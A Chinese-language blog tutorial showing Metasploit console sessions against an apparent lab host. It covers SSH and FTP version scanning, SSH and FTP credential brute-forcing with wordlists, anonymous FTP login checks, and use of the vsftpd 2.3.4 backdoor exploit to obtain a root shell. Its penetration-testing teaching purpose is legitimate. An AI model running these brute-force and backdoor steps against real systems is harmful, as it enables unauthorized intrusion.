欢迎各位彦祖与热巴畅游本人专栏与博客
你的三连是我最大的动力
以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]
专栏跑道一
➡️网络空间安全——全栈前沿技术持续深入学习
专栏跑道二
➡️ 24 Network Security -LJS
专栏跑道三
➡️ MYSQL REDIS Advance operation
专栏跑道四
➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]
专栏跑道五
➡️RHCE-LJS[Linux高端骚操作实战篇]
专栏跑道六
➡️数据结构与算法[考研+实际工作应用+C程序设计]
专栏跑道七
➡️RHCSA-LJS[Linux初级及进阶骚技能]
上节回顾
目录
欢迎各位彦祖与热巴畅游本人专栏与博客
你的三连是我最大的动力
以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]
专栏跑道一
➡️网络空间安全——全栈前沿技术持续深入学习
专栏跑道二
➡️ 24 Network Security -LJS
专栏跑道三
➡️ MYSQL REDIS Advance operation
专栏跑道四
➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]
专栏跑道五
➡️RHCE-LJS[Linux高端骚操作实战篇]编辑
专栏跑道六
➡️数据结构与算法[考研+实际工作应用+C程序设计]
专栏跑道七
➡️RHCSA-LJS[Linux初级及进阶骚技能]
上节回顾
1.基于 SSH 协议收集信息
查看 ssh 服务的版本信息
SSH 暴力破解
注意:
回到 MSF 终端
2.基于 FTP 协议收集信息
2.1查看 ftp 服务的版本信息
加载 ftp 服务版本扫描模块
查看设置参数
设置目标 IP,可以设置多个
执行扫描,输入 exploit 或 run
退出
扫描出 ftp 服务的版本号,我们可以尝试搜索版本号,看看有没有可以利用的模块[或者搜索 vsftpd]
所以尝试利用下这个模块
拿到了 shell,而且是 root 权限,那么尝试执行下命令
执行 id 命令, 查看当前用户
执行 ifconfig 命令,查看 IP 地址
2.2 ftp 匿名登录扫描[直接肝就完事了]
2.3 ftp 暴力破解
不同于SSH暴力破解的唯一一步:ftp漏洞的模块利用
最后run一下即可编辑编辑
1.基于 SSH 协议收集信息
查看 ssh 服务的版本信息
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# msfconsole
Metasploit tip: Tired of setting RHOSTS for modules? Try globally setting it
with setg RHOSTS x.x.x.xIIIIII dTb.dTb _.---._II 4' v 'B .'"".'/|\`.""'.II 6. .P : .' / | \ `. :II 'T;. .;P' '.' / | \ `.'II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'I love shells --egypt=[ metasploit v6.3.55-dev ]
+ -- --=[ 2397 exploits - 1232 auxiliary - 422 post ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]Metasploit Documentation: https://docs.metasploit.com/msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > show options Module options (auxiliary/scanner/ssh/ssh_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs /using-metasploit/basics/using-metasploit.html RPORT 22 yes The target port (TCP) THREADS 1 yes The number of concurrent threads (max one per host)TIMEOUT 30 yes Timeout for the SSH probeView the full module info with the info, or info -d command.msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ssh/ssh_version) > run
SSH 暴力破解
msf6 auxiliary(scanner/ssh/ssh_version) > back
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > show optionsModule options (auxiliary/scanner/ssh/ssh_login):Name Current Setting Required Description---- --------------- -------- -----------ANONYMOUS_LOGIN false yes Attempt to login with a blank username and passwordBLANK_PASSWORDS false no Try blank passwords for all usersBRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5DB_ALL_CREDS false no Try each user/password couple stored in the current databaseDB_ALL_PASS false no Add all passwords in the current database to the listDB_ALL_USERS false no Add all users in the current database to the listDB_SKIP_EXISTING none no Skip existing credentials stored in the currentdatabase (Accepted: none, user, user&realm)PASSWORD no A specific password to authenticate withPASS_FILE no File containing passwords, one per lineRHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT 22 yes The target portSTOP_ON_SUCCESS false yes Stop guessing when a credential works for a hostTHREADS 1 yes The number of concurrent threads (max one per host)USERNAME no A specific username to authenticate asUSERPASS_FILE no File containing users and passwords separated by space, one pair per lineUSER_AS_PASS false no Try the username as the password for all usersUSER_FILE no File containing usernames, one per lineVERBOSE false yes Whether to print output for all attemptsView the full module info with the info, or info -d command.msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt 
- 因为字典文件中不包含我们的用户密码信息我们把自己的密码信息手动加入进去以便展示效果新开一个终端窗口
- 设置字典文件默认的字典文件是不满足实际需求的后期我们使用更强大的字典文件。
注意:
- 先添加如下用户密码文件,之后在重新试一次即可
──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# echo "msfadmin msfadmin" >> /usr/share/metasploitframework/data/wordlists/root_userpass.txt
回到 MSF 终端
msf6 auxiliary(scanner/ssh/ssh_login) > run
2.基于 FTP 协议收集信息
2.1查看 ftp 服务的版本信息
加载 ftp 服务版本扫描模块
msf6 auxiliary(scanner/ssh/ssh_login) > back
msf6 > use auxiliary/scanner/ftp/ftp_version
查看设置参数
msf6 auxiliary(scanner/ftp/ftp_version) > show optionsModule options (auxiliary/scanner/ftp/ftp_version):Name Current Setting Required Description---- --------------- -------- -----------FTPPASS mozilla@example.com no The password for the specified usernameFTPUSER anonymous no The username to authenticate asRHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT 21 yes The target port (TCP)THREADS 1 yes The number of concurrent threads (max one per host)View the full module info with the info, or info -d command.
设置目标 IP,可以设置多个
msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.1.180
执行扫描,输入 exploit 或 run
msf6 auxiliary(scanner/ftp/ftp_version) > run
- 我们可以发现:扫描出结果是:vsFTPd 2.3.4
退出
msf6 auxiliary(scanner/ftp/ftp_version) > back
msf6 > 扫描出 ftp 服务的版本号,我们可以尝试搜索版本号,看看有没有可以利用的模块[或者搜索 vsftpd]
msf6 > search 2.3.4Matching Modules
================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection1 auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials2 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution3 exploit/unix/http/zivif_ipcheck_exec 2017-09-01 excellent Yes Zivif Camera iptest.cgi Blind Remote Command Execution4 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code ExecutionInteract with a module by name or index. For example info 4, use 4 or use exploit/multi/http/oscommerce_installer_unauth_code_exec msf6 > search vsftpdMatching Modules
================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 auxiliary/dos/ftp/vsftpd_232 2011-02-03 normal Yes VSFTPD 2.3.2 Denial of Service1 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command ExecutionInteract with a module by name or index. For example info 1, use 1 or use exploit/unix/ftp/vsftpd_234_backdoor msf6 > 
- 发现存在一个 exploit 模块,而且这个版本的 ftp 服务存在一个后门
所以尝试利用下这个模块
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show optionsModule options (exploit/unix/ftp/vsftpd_234_backdoor):Name Current Setting Required Description---- --------------- -------- -----------CHOST no The local client addressCPORT no The local client portProxies no A proxy chain of format type:host:port[,type:host:port][...]RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT 21 yes The target port (TCP)Payload options (cmd/unix/interact):Name Current Setting Required Description---- --------------- -------- -----------Exploit target:Id Name-- ----0 AutomaticView the full module info with the info, or info -d command.msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
拿到了 shell,而且是 root 权限,那么尝试执行下命令
执行 id 命令, 查看当前用户
执行 ifconfig 命令,查看 IP 地址
2.2 ftp 匿名登录扫描[直接肝就完事了]
- 其实就是利用了漏洞模块罢了
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > back
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > show optionsModule options (auxiliary/scanner/ftp/anonymous):Name Current Setting Required Description---- --------------- -------- -----------FTPPASS mozilla@example.com no The password for the specified usernameFTPUSER anonymous no The username to authenticate asRHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT 21 yes The target port (TCP)THREADS 1 yes The number of concurrent threads (max one per host)View the full module info with the info, or info -d command.msf6 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ftp/anonymous) > run
2.3 ftp 暴力破解
不同于SSH暴力破解的唯一一步:ftp漏洞的模块利用
msf6 auxiliary(scanner/ftp/anonymous) > back msf6 > use auxiliary/scanner/ftp/ftp_login
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > back
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > show optionsModule options (auxiliary/scanner/ftp/anonymous):Name Current Setting Required Description---- --------------- -------- -----------FTPPASS mozilla@example.com no The password for the specified usernameFTPUSER anonymous no The username to authenticate asRHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT 21 yes The target port (TCP)THREADS 1 yes The number of concurrent threads (max one per host)View the full module info with the info, or info -d command.msf6 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ftp/anonymous) > back
msf6 > use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login) > show optionsModule options (auxiliary/scanner/ftp/ftp_login):Name Current Setting Required Description---- --------------- -------- -----------ANONYMOUS_LOGIN false yes Attempt to login with a blank username and passwordBLANK_PASSWORDS false no Try blank passwords for all usersBRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5DB_ALL_CREDS false no Try each user/password couple stored in the current databaseDB_ALL_PASS false no Add all passwords in the current database to the listDB_ALL_USERS false no Add all users in the current database to the listDB_SKIP_EXISTING none no Skip existing credentials stored in the currentdatabase (Accepted: none, user, user&realm)PASSWORD no A specific password to authenticate withPASS_FILE no File containing passwords, one per lineProxies no A proxy chain of format type:host:port[,type:host:port][...]RECORD_GUEST false no Record anonymous/guest logins to the databaseRHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT 21 yes The target port (TCP)STOP_ON_SUCCESS false yes Stop guessing when a credential works for a hostTHREADS 1 yes The number of concurrent threads (max one per host)USERNAME no A specific username to authenticate asUSERPASS_FILE no File containing users and passwords separated by space, one pair per lineUSER_AS_PASS false no Try the username as the password for all usersUSER_FILE no File containing usernames, one per lineVERBOSE true yes Whether to print output for all attemptsView the full module info with the info, or info -d command.msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
最后run一下即可
![[CISCN 2019华东南]Web11](https://i-blog.csdnimg.cn/img_convert/6e44fceaf50d342a13c465994e82beef.png)
